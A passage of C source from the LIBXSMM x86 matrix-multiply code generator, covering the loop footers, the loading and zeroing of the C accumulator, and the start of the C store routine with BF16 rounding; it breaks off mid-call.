libxsmm_x86_instruction_push_reg( io_generated_code, i_gp_reg_mapping->gp_reg_reduce_loop );
libxsmm_generator_gemm_header_reduceloop( io_generated_code, io_loop_label_tracker, i_gp_reg_mapping, i_micro_kernel_config );
libxsmm_x86_instruction_alu_mem( io_generated_code,
i_micro_kernel_config->alu_mov_instruction,
i_gp_reg_mapping->gp_reg_a,
i_gp_reg_mapping->gp_reg_reduce_loop, 8,
0,
i_gp_reg_mapping->gp_reg_help_0,
0 );
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_sub_instruction,
i_gp_reg_mapping->gp_reg_help_0, ((i_xgemm_desc->m)*(i_micro_kernel_config->datatype_size)) );
libxsmm_x86_instruction_alu_mem( io_generated_code,
i_micro_kernel_config->alu_mov_instruction,
i_gp_reg_mapping->gp_reg_a,
i_gp_reg_mapping->gp_reg_reduce_loop, 8,
0,
i_gp_reg_mapping->gp_reg_help_0,
1 );
libxsmm_x86_instruction_alu_mem( io_generated_code,
i_micro_kernel_config->alu_mov_instruction,
i_gp_reg_mapping->gp_reg_b,
i_gp_reg_mapping->gp_reg_reduce_loop, 8,
0,
i_gp_reg_mapping->gp_reg_help_0,
0 );
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction,
i_gp_reg_mapping->gp_reg_help_0, l_b_offset );
libxsmm_x86_instruction_alu_mem( io_generated_code,
i_micro_kernel_config->alu_mov_instruction,
i_gp_reg_mapping->gp_reg_b,
i_gp_reg_mapping->gp_reg_reduce_loop, 8,
0,
i_gp_reg_mapping->gp_reg_help_0,
1 );
if ( i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2 ||
i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2BL2_VIA_C ) {
libxsmm_x86_instruction_alu_mem( io_generated_code,
i_micro_kernel_config->alu_mov_instruction,
i_gp_reg_mapping->gp_reg_a_prefetch,
i_gp_reg_mapping->gp_reg_reduce_loop, 8,
0,
i_gp_reg_mapping->gp_reg_help_0,
0 );
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_sub_instruction,
i_gp_reg_mapping->gp_reg_help_0, ((i_xgemm_desc->m)*(i_micro_kernel_config->datatype_size)) );
libxsmm_x86_instruction_alu_mem( io_generated_code,
i_micro_kernel_config->alu_mov_instruction,
i_gp_reg_mapping->gp_reg_a_prefetch,
i_gp_reg_mapping->gp_reg_reduce_loop, 8,
0,
i_gp_reg_mapping->gp_reg_help_0,
1 );
}
libxsmm_generator_gemm_footer_reduceloop( io_generated_code, io_loop_label_tracker, i_gp_reg_mapping, i_micro_kernel_config, i_xgemm_desc);
libxsmm_x86_instruction_pop_reg( io_generated_code, i_gp_reg_mapping->gp_reg_reduce_loop );
libxsmm_x86_instruction_pop_reg( io_generated_code, i_gp_reg_mapping->gp_reg_help_0 );
} else {
/* handle trans B */
int l_b_offset = 0;
if ( (i_xgemm_desc->flags & LIBXSMM_GEMM_FLAG_TRANS_B) > 0 ) {
l_b_offset = i_n_blocking * i_micro_kernel_config->datatype_size;
} else {
l_b_offset = i_n_blocking * i_xgemm_desc->ldb * i_micro_kernel_config->datatype_size;
}
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction,
i_gp_reg_mapping->gp_reg_b, l_b_offset );
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_sub_instruction,
i_gp_reg_mapping->gp_reg_a, ((i_xgemm_desc->m)*(i_micro_kernel_config->datatype_size)) );
if ( i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2 ||
i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2BL2_VIA_C ) {
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_sub_instruction,
i_gp_reg_mapping->gp_reg_a_prefetch, ((i_xgemm_desc->m)*(i_micro_kernel_config->datatype_size)) );
}
}
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_cmp_instruction, i_gp_reg_mapping->gp_reg_nloop, i_n_done );
libxsmm_x86_instruction_jump_back_to_label( io_generated_code, i_micro_kernel_config->alu_jmp_instruction, io_loop_label_tracker );
}
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_header_mloop( libxsmm_generated_code* io_generated_code,
libxsmm_loop_label_tracker* io_loop_label_tracker,
const libxsmm_gp_reg_mapping* i_gp_reg_mapping,
const libxsmm_micro_kernel_config* i_micro_kernel_config,
const unsigned int i_m_blocking ) {
libxsmm_x86_instruction_register_jump_back_label( io_generated_code, io_loop_label_tracker );
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction, i_gp_reg_mapping->gp_reg_mloop, i_m_blocking );
}
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_footer_mloop( libxsmm_generated_code* io_generated_code,
libxsmm_loop_label_tracker* io_loop_label_tracker,
const libxsmm_gp_reg_mapping* i_gp_reg_mapping,
const libxsmm_micro_kernel_config* i_micro_kernel_config,
const libxsmm_gemm_descriptor* i_xgemm_desc,
const unsigned int i_m_blocking,
const unsigned int i_m_done ) {
/* advance C pointer */
if ( LIBXSMM_GEMM_PRECISION_BF16 == LIBXSMM_GETENUM_OUT( i_xgemm_desc->datatype ) ) {
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction,
i_gp_reg_mapping->gp_reg_c, i_m_blocking*(i_micro_kernel_config->datatype_size/2) );
} else if ( LIBXSMM_GEMM_PRECISION_I8 == LIBXSMM_GETENUM_OUT( i_xgemm_desc->datatype ) ) {
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction,
i_gp_reg_mapping->gp_reg_c, i_m_blocking*(i_micro_kernel_config->datatype_size/4) );
} else {
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction,
i_gp_reg_mapping->gp_reg_c, i_m_blocking*(i_micro_kernel_config->datatype_size) );
}
/* C prefetch */
#if 0
if ( i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_CL2 ||
i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2CL2BL2_VIA_C ) {
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction,
i_gp_reg_mapping->gp_reg_c_prefetch, i_m_blocking*(i_micro_kernel_config->datatype_size) );
}
#endif
/* B prefetch */
if ( i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_BL2_VIA_C ||
i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2BL2_VIA_C ||
i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2BL2_VIA_C_AHEAD ) {
if ( (i_xgemm_desc->flags & LIBXSMM_GEMM_FLAG_TRANS_B) == 0 ) {
unsigned int l_type_scaling;
if ( (LIBXSMM_GEMM_PRECISION_BF16 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype )) ||
(LIBXSMM_GEMM_PRECISION_I16 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype )) ) {
l_type_scaling = 2;
} else if ( LIBXSMM_GEMM_PRECISION_I8 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) {
l_type_scaling = 4;
} else {
l_type_scaling = 1;
}
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction,
i_gp_reg_mapping->gp_reg_b_prefetch, i_m_blocking*(i_micro_kernel_config->datatype_size/l_type_scaling) );
}
}
/* A prefetch */
if ( i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2 ||
i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2BL2_VIA_C) {
if (i_xgemm_desc->flags & LIBXSMM_GEMM_FLAG_BATCH_REDUCE_ADDRESS) {
if ( i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2 ) {
libxsmm_x86_instruction_push_reg( io_generated_code, i_gp_reg_mapping->gp_reg_help_0 );
libxsmm_x86_instruction_push_reg( io_generated_code, i_gp_reg_mapping->gp_reg_reduce_loop );
libxsmm_generator_gemm_header_reduceloop( io_generated_code, io_loop_label_tracker, i_gp_reg_mapping, i_micro_kernel_config );
libxsmm_x86_instruction_alu_mem( io_generated_code,
i_micro_kernel_config->alu_mov_instruction,
i_gp_reg_mapping->gp_reg_a_prefetch,
i_gp_reg_mapping->gp_reg_reduce_loop, 8,
0,
i_gp_reg_mapping->gp_reg_help_0,
0 );
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_sub_instruction, i_gp_reg_mapping->gp_reg_help_0,
((i_xgemm_desc->k) * (i_micro_kernel_config->datatype_size) * (i_xgemm_desc->lda) ) -
(i_m_blocking * (i_micro_kernel_config->datatype_size)) );
libxsmm_x86_instruction_alu_mem( io_generated_code,
i_micro_kernel_config->alu_mov_instruction,
i_gp_reg_mapping->gp_reg_a_prefetch,
i_gp_reg_mapping->gp_reg_reduce_loop, 8,
0,
i_gp_reg_mapping->gp_reg_help_0,
1 );
libxsmm_generator_gemm_footer_reduceloop( io_generated_code, io_loop_label_tracker, i_gp_reg_mapping, i_micro_kernel_config, i_xgemm_desc);
libxsmm_x86_instruction_pop_reg( io_generated_code, i_gp_reg_mapping->gp_reg_reduce_loop );
libxsmm_x86_instruction_pop_reg( io_generated_code, i_gp_reg_mapping->gp_reg_help_0 );
}
} else {
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_sub_instruction, i_gp_reg_mapping->gp_reg_a_prefetch,
((i_xgemm_desc->k) * (i_micro_kernel_config->datatype_size) * (i_xgemm_desc->lda) ) -
(i_m_blocking * (i_micro_kernel_config->datatype_size)) );
}
}
/* advance A pointer */
if (i_xgemm_desc->flags & LIBXSMM_GEMM_FLAG_BATCH_REDUCE_ADDRESS) {
libxsmm_x86_instruction_push_reg( io_generated_code, i_gp_reg_mapping->gp_reg_help_0 );
libxsmm_x86_instruction_push_reg( io_generated_code, i_gp_reg_mapping->gp_reg_reduce_loop );
libxsmm_generator_gemm_header_reduceloop( io_generated_code, io_loop_label_tracker, i_gp_reg_mapping, i_micro_kernel_config );
libxsmm_x86_instruction_alu_mem( io_generated_code,
i_micro_kernel_config->alu_mov_instruction,
i_gp_reg_mapping->gp_reg_a,
i_gp_reg_mapping->gp_reg_reduce_loop, 8,
0,
i_gp_reg_mapping->gp_reg_help_0,
0 );
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_sub_instruction, i_gp_reg_mapping->gp_reg_help_0,
((i_xgemm_desc->k) * (i_micro_kernel_config->datatype_size) * (i_xgemm_desc->lda) ) - (i_m_blocking * (i_micro_kernel_config->datatype_size)) );
libxsmm_x86_instruction_alu_mem( io_generated_code,
i_micro_kernel_config->alu_mov_instruction,
i_gp_reg_mapping->gp_reg_a,
i_gp_reg_mapping->gp_reg_reduce_loop, 8,
0,
i_gp_reg_mapping->gp_reg_help_0,
1 );
libxsmm_generator_gemm_footer_reduceloop( io_generated_code, io_loop_label_tracker, i_gp_reg_mapping, i_micro_kernel_config, i_xgemm_desc);
libxsmm_x86_instruction_pop_reg( io_generated_code, i_gp_reg_mapping->gp_reg_reduce_loop );
libxsmm_x86_instruction_pop_reg( io_generated_code, i_gp_reg_mapping->gp_reg_help_0 );
} else {
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_sub_instruction, i_gp_reg_mapping->gp_reg_a,
((i_xgemm_desc->k) * (i_micro_kernel_config->datatype_size) * (i_xgemm_desc->lda) ) - (i_m_blocking * (i_micro_kernel_config->datatype_size)) );
}
/* loop handling */
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_cmp_instruction, i_gp_reg_mapping->gp_reg_mloop, i_m_done );
libxsmm_x86_instruction_jump_back_to_label( io_generated_code, i_micro_kernel_config->alu_jmp_instruction, io_loop_label_tracker );
}
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_load_C( libxsmm_generated_code* io_generated_code,
const libxsmm_gp_reg_mapping* i_gp_reg_mapping,
const libxsmm_micro_kernel_config* i_micro_kernel_config,
const libxsmm_gemm_descriptor* i_xgemm_desc,
const unsigned int i_m_blocking,
const unsigned int i_n_blocking ) {
unsigned int l_m_blocking, l_vec_reg_acc_start;
/* register blocking counter in n */
unsigned int l_n = 0;
/* register blocking counter in m */
unsigned int l_m = 0;
assert(0 < i_micro_kernel_config->vector_length);
/* deriving register blocking from kernel config */
l_m_blocking = ( i_m_blocking % i_micro_kernel_config->vector_length == 0 ) ? i_m_blocking/i_micro_kernel_config->vector_length : (i_m_blocking/i_micro_kernel_config->vector_length)+1;
/* start register of accumulator */
l_vec_reg_acc_start = i_micro_kernel_config->vector_reg_count - (i_n_blocking * l_m_blocking);
#if !defined(NDEBUG)
/* Do some test if it is possible to generate the requested code.
This is not done in release mode and therefore bad
things might happen.... HUAAH */
if (i_micro_kernel_config->instruction_set == LIBXSMM_X86_SSE3 ||
i_micro_kernel_config->instruction_set == LIBXSMM_X86_AVX ||
i_micro_kernel_config->instruction_set == LIBXSMM_X86_AVX2 ) {
if ( (i_n_blocking > 3) || (i_n_blocking < 1) || (i_m_blocking < 1) ) {
LIBXSMM_HANDLE_ERROR( io_generated_code, LIBXSMM_ERR_REG_BLOCK );
return;
}
} else if ( i_micro_kernel_config->instruction_set < LIBXSMM_X86_AVX512_CORE ) {
if ( (i_n_blocking > 30) || (i_n_blocking < 1) || (l_m_blocking != 1) ) {
LIBXSMM_HANDLE_ERROR( io_generated_code, LIBXSMM_ERR_REG_BLOCK );
return;
}
} else if ( i_micro_kernel_config->instruction_set >= LIBXSMM_X86_AVX512_CORE ) {
if ( (i_n_blocking > 30) || (i_n_blocking < 1) || (l_m_blocking < 1) || (l_m_blocking > 6) ) {
LIBXSMM_HANDLE_ERROR( io_generated_code, LIBXSMM_ERR_REG_BLOCK );
return;
}
} else {}
#if 0
if ( i_m_blocking % i_micro_kernel_config->vector_length != 0 ) {
LIBXSMM_HANDLE_ERROR( io_generated_code, LIBXSMM_ERR_M_BLOCK );
return;
}
#endif
#endif /*!defined(NDEBUG)*/
/* load C accumulator */
if (0 == (LIBXSMM_GEMM_FLAG_BETA_0 & i_xgemm_desc->flags)) { /* Beta=1 */
/* pure BF16 kernel */
if ( ( (i_micro_kernel_config->instruction_set >= LIBXSMM_X86_AVX512_CORE) && (i_micro_kernel_config->instruction_set <= LIBXSMM_X86_ALLFEAT) ) &&
( (LIBXSMM_GEMM_PRECISION_BF16 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) && (LIBXSMM_GEMM_PRECISION_BF16 == LIBXSMM_GETENUM_OUT( i_xgemm_desc->datatype ) ) ) ) {
/* we add when scaling during conversion to FP32 */
for ( l_n = 0; l_n < i_n_blocking; l_n++ ) {
for ( l_m = 0; l_m < l_m_blocking; l_m++ ) {
/* load 16 bit values into ymm portion of the register */
if ( (i_micro_kernel_config->use_masking_a_c != 0) && ( l_m == (l_m_blocking - 1) ) ) {
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VMOVDQU16,
i_gp_reg_mapping->gp_reg_c,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size/2),
'z',
0, 2, 1, 0 );
} else {
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
i_micro_kernel_config->c_vmove_instruction,
i_gp_reg_mapping->gp_reg_c,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size/2),
'y',
0, 0, 1, 0 );
}
/* convert 16 bit values into 32 bit (integer convert) */
libxsmm_x86_instruction_vec_compute_convert( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VPMOVSXWD,
i_micro_kernel_config->vector_name,
0, LIBXSMM_X86_VEC_REG_UNDEF,
l_vec_reg_acc_start + l_m + (l_m_blocking * l_n),
LIBXSMM_X86_VEC_REG_UNDEF);
/* shift 16 bits to the left to generate valid FP32 numbers */
libxsmm_x86_instruction_vec_shuffle_reg(io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VPSLLD_I,
i_micro_kernel_config->vector_name,
l_vec_reg_acc_start + l_m + (l_m_blocking * l_n),
LIBXSMM_X86_VEC_REG_UNDEF,
l_vec_reg_acc_start + l_m + (l_m_blocking * l_n),
16);
}
}
/* pure int8 kernel */
} else if ( ( (i_micro_kernel_config->instruction_set >= LIBXSMM_X86_AVX512_CORE) && (i_micro_kernel_config->instruction_set <= LIBXSMM_X86_ALLFEAT) ) &&
( (LIBXSMM_GEMM_PRECISION_I8 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) && (LIBXSMM_GEMM_PRECISION_I8 == LIBXSMM_GETENUM_OUT( i_xgemm_desc->datatype ) ) ) ) {
/* we need to up convert int8 to int32 */
for ( l_n = 0; l_n < i_n_blocking; l_n++ ) {
for ( l_m = 0; l_m < l_m_blocking; l_m++ ) {
/* load 16 bit values into xmm portion of the register */
if ( (i_micro_kernel_config->use_masking_a_c != 0) && ( l_m == (l_m_blocking - 1) ) ) {
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VMOVDQU8,
i_gp_reg_mapping->gp_reg_c,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size/4),
'z',
0, 2, 1, 0 );
} else {
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
i_micro_kernel_config->c_vmove_instruction,
i_gp_reg_mapping->gp_reg_c,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size/4),
'x',
0, 0, 1, 0 );
}
/* convert 8 bit values into 32 bit (integer convert) */
if ( (i_xgemm_desc->flags & LIBXSMM_GEMM_FLAG_C_UNSIGNED) != 0 ) {
libxsmm_x86_instruction_vec_compute_convert( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VPMOVZXBD,
i_micro_kernel_config->vector_name,
0, LIBXSMM_X86_VEC_REG_UNDEF,
l_vec_reg_acc_start + l_m + (l_m_blocking * l_n),
LIBXSMM_X86_VEC_REG_UNDEF);
} else {
libxsmm_x86_instruction_vec_compute_convert( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VPMOVSXBD,
i_micro_kernel_config->vector_name,
0, LIBXSMM_X86_VEC_REG_UNDEF,
l_vec_reg_acc_start + l_m + (l_m_blocking * l_n),
LIBXSMM_X86_VEC_REG_UNDEF);
}
}
}
} else {
/* adding to C, so let's load C */
for ( l_n = 0; l_n < i_n_blocking; l_n++ ) {
for ( l_m = 0; l_m < l_m_blocking; l_m++ ) {
/* we only mask the last m-blocked load */
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
i_micro_kernel_config->c_vmove_instruction,
i_gp_reg_mapping->gp_reg_c,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size),
i_micro_kernel_config->vector_name,
l_vec_reg_acc_start + l_m + (l_m_blocking * l_n), ( l_m == (l_m_blocking - 1) ) ? i_micro_kernel_config->use_masking_a_c : 0, 1, 0 );
}
#if 0
if ( i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_CL2 ||
i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2CL2BL2_VIA_C ) {
for (l_m = 0; l_m < l_m_blocking; l_m += l_m++ ) {
libxsmm_x86_instruction_prefetch( io_generated_code,
i_micro_kernel_config->prefetch_instruction,
i_gp_reg_mapping->gp_reg_c_prefetch,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size));
}
}
#endif
}
}
} else {
/* overwriting C, so let's xout accumulator */
for ( l_n = 0; l_n < i_n_blocking; l_n++ ) {
for ( l_m = 0; l_m < l_m_blocking; l_m++ ) {
libxsmm_x86_instruction_vec_compute_reg( io_generated_code,
i_micro_kernel_config->instruction_set,
i_micro_kernel_config->vxor_instruction,
i_micro_kernel_config->vector_name,
l_vec_reg_acc_start + l_m + (l_m_blocking * l_n),
l_vec_reg_acc_start + l_m + (l_m_blocking * l_n),
l_vec_reg_acc_start + l_m + (l_m_blocking * l_n) );
}
#if 0
if ( i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_CL2 ||
i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2CL2BL2_VIA_C ) {
for (l_m = 0; l_m < l_m_blocking; l_m += l_m++ ) {
libxsmm_x86_instruction_prefetch( io_generated_code,
i_micro_kernel_config->prefetch_instruction,
i_gp_reg_mapping->gp_reg_c_prefetch,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size));
}
}
#endif
}
}
}
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_store_C( libxsmm_generated_code* io_generated_code,
const libxsmm_gp_reg_mapping* i_gp_reg_mapping,
const libxsmm_micro_kernel_config* i_micro_kernel_config,
const libxsmm_gemm_descriptor* i_xgemm_desc,
const unsigned int i_m_blocking,
const unsigned int i_n_blocking )
{
/* deriving register blocking from kernel config */
unsigned int l_m_blocking = ( i_m_blocking % i_micro_kernel_config->vector_length == 0 ) ? i_m_blocking/i_micro_kernel_config->vector_length : (i_m_blocking/i_micro_kernel_config->vector_length)+1;
/* register blocking counter in n */
unsigned int l_n = 0;
/* register blocking counter in m */
unsigned int l_m = 0;
/* start register of accumulator */
unsigned int l_vec_reg_acc_start = i_micro_kernel_config->vector_reg_count - (i_n_blocking * l_m_blocking);
/* select store instruction */
unsigned int l_vstore = (LIBXSMM_GEMM_FLAG_ALIGN_C_NTS_HINT == (LIBXSMM_GEMM_FLAG_ALIGN_C_NTS_HINT & i_xgemm_desc->flags)) ? i_micro_kernel_config->c_vmove_nts_instruction : i_micro_kernel_config->c_vmove_instruction;
/* @TODO fix this test */
#if !defined(NDEBUG)
if (i_micro_kernel_config->instruction_set == LIBXSMM_X86_SSE3 ||
i_micro_kernel_config->instruction_set == LIBXSMM_X86_AVX ||
i_micro_kernel_config->instruction_set == LIBXSMM_X86_AVX2 ) {
if ( (i_n_blocking > 3) || (i_n_blocking < 1) || (i_m_blocking < 1) ) {
LIBXSMM_HANDLE_ERROR( io_generated_code, LIBXSMM_ERR_REG_BLOCK );
return;
}
} else if ( i_micro_kernel_config->instruction_set < LIBXSMM_X86_AVX512_CORE ) {
if ( (i_n_blocking > 30) || (i_n_blocking < 1) || (i_m_blocking != i_micro_kernel_config->vector_length) ) {
LIBXSMM_HANDLE_ERROR( io_generated_code, LIBXSMM_ERR_REG_BLOCK );
return;
}
} else if ( i_micro_kernel_config->instruction_set >= LIBXSMM_X86_AVX512_CORE ) {
if ( (i_n_blocking > 30) || (i_n_blocking < 1) || (l_m_blocking < 1) || (l_m_blocking > 6) ) {
LIBXSMM_HANDLE_ERROR( io_generated_code, LIBXSMM_ERR_REG_BLOCK );
return;
}
} else {}
#if 0
if ( i_m_blocking % i_micro_kernel_config->vector_length != 0 ) {
LIBXSMM_HANDLE_ERROR( io_generated_code, LIBXSMM_ERR_M_BLOCK );
return;
}
#endif
#endif
if ( ( (i_micro_kernel_config->instruction_set == LIBXSMM_X86_AVX512_CORE) || (i_micro_kernel_config->instruction_set == LIBXSMM_X86_AVX512_CLX) ) &&
( (LIBXSMM_GEMM_PRECISION_BF16 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) && (LIBXSMM_GEMM_PRECISION_BF16 == LIBXSMM_GETENUM_OUT( i_xgemm_desc->datatype ) ) ) ) {
/* init stack with helper variables for SW-based RNE rounding */
/* push 0x7f800000 on the stack, naninf masking */
libxsmm_x86_instruction_alu_imm( io_generated_code, LIBXSMM_X86_INSTR_MOVQ, i_gp_reg_mapping->gp_reg_help_2, 0x7f800000);
libxsmm_x86_instruction_push_reg( io_generated_code, i_gp_reg_mapping->gp_reg_help_2 );
/* push 0x00010000 on the stack, fixup masking */
libxsmm_x86_instruction_alu_imm( io_generated_code, LIBXSMM_X86_INSTR_MOVQ, i_gp_reg_mapping->gp_reg_help_2, 0x00010000);
libxsmm_x86_instruction_push_reg( io_generated_code, i_gp_reg_mapping->gp_reg_help_2 );
/* push 0x00007fff on the stack, rneadd */
libxsmm_x86_instruction_alu_imm( io_generated_code, LIBXSMM_X86_INSTR_MOVQ, i_gp_reg_mapping->gp_reg_help_2, 0x00007fff);
libxsmm_x86_instruction_push_reg( io_generated_code, i_gp_reg_mapping->gp_reg_help_2 );
/* push 0x00000001 on the stack, fixup */
libxsmm_x86_instruction_alu_imm( io_generated_code, LIBXSMM_X86_INSTR_MOVQ, i_gp_reg_mapping->gp_reg_help_2, 0x00000001);
libxsmm_x86_instruction_push_reg( io_generated_code, i_gp_reg_mapping->gp_reg_help_2 );
/* storing downconverted and rounded C accumulator */
for ( l_n = 0; l_n < i_n_blocking; l_n++ ) {
for ( l_m = 0; l_m < l_m_blocking; l_m++ ) {
unsigned int reg_X = l_vec_reg_acc_start + l_m + (l_m_blocking * l_n);
/* and with naninf */
libxsmm_x86_instruction_vec_compute_mem( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VPANDD,
1,
LIBXSMM_X86_GP_REG_RSP,
LIBXSMM_X86_GP_REG_UNDEF,
0,
24,
i_micro_kernel_config->vector_name,
reg_X,
0 );
/* and with fixup */
libxsmm_x86_instruction_vec_compute_mem( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VPANDD,
1,
LIBXSMM_X86_GP_REG_RSP,
LIBXSMM_X86_GP_REG_UNDEF,
0,
16,
i_micro_kernel_config->vector_name,
reg_X,
1 );
/* compute naninf mask k7 */
libxsmm_x86_instruction_vec_compute_mem_mask( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VPCMPD,
1,
LIBXSMM_X86_GP_REG_RSP,
LIBXSMM_X86_GP_REG_UNDEF,
0,
24,
i_micro_kernel_config->vector_name,
0,
LIBXSMM_X86_VEC_REG_UNDEF,
4,
7, 0 );
/* compute fixup mask k6 */
libxsmm_x86_instruction_vec_compute_mem_mask( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VPCMPD,
1,
LIBXSMM_X86_GP_REG_RSP,
LIBXSMM_X86_GP_REG_UNDEF,
0,
16,
i_micro_kernel_config->vector_name,
1,
LIBXSMM_X86_VEC_REG_UNDEF,
0,
6, 0 );
/* load rneadd */
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VBROADCASTSS,
LIBXSMM_X86_GP_REG_RSP,
LIBXSMM_X86_GP_REG_UNDEF, 0,
8,
i_micro_kernel_config->vector_name,
0, 0, 1, 0 );
/* load fixup */
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VBROADCASTSS,
LIBXSMM_X86_GP_REG_RSP,
LIBXSMM_X86_GP_REG_UNDEF, 0,
0,
i_micro_kernel_config->vector_name,
1, 0, 1, 0 );
/* compute fixup */
libxsmm_x86_instruction_vec_compute_reg_mask( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VPADDD,
i_micro_kernel_config->vector_name,
1,
0,
0,
LIBXSMM_X86_IMM_UNDEF,
6,
0 );
/* compute fixup */
libxsmm_x86_instruction_vec_compute_reg_mask( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VPADDD,
i_micro_kernel_config->vector_name,
0,
reg_X,
reg_X,
LIBXSMM_X86_IMM_UNDEF,
7,
0 );
/* shift FP32 by 16bit to right */
libxsmm_x86_instruction_vec_shuffle_reg(io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VPSRAD_I,
i_micro_kernel_config->vector_name,
reg_X,
LIBXSMM_X86_VEC_REG_UNDEF,
reg_X,
16);
/* shift FP32 by 16bit to right */
libxsmm_x86_instruction_vec_compute_convert( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VPMOVDW,
i_micro_kernel_config->vector_name,
reg_X, LIBXSMM_X86_VEC_REG_UNDEF,
0,
LIBXSMM_X86_VEC_REG_UNDEF);
/* store 16 bit values into ymm portion of the register */
if ( (i_micro_kernel_config->use_masking_a_c != 0) && ( l_m == (l_m_blocking - 1) ) ) {
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VMOVDQU16,
i_gp_reg_mapping->gp_reg_c,
LIBXSMM_X86_GP_REG_UNDEF, 0,
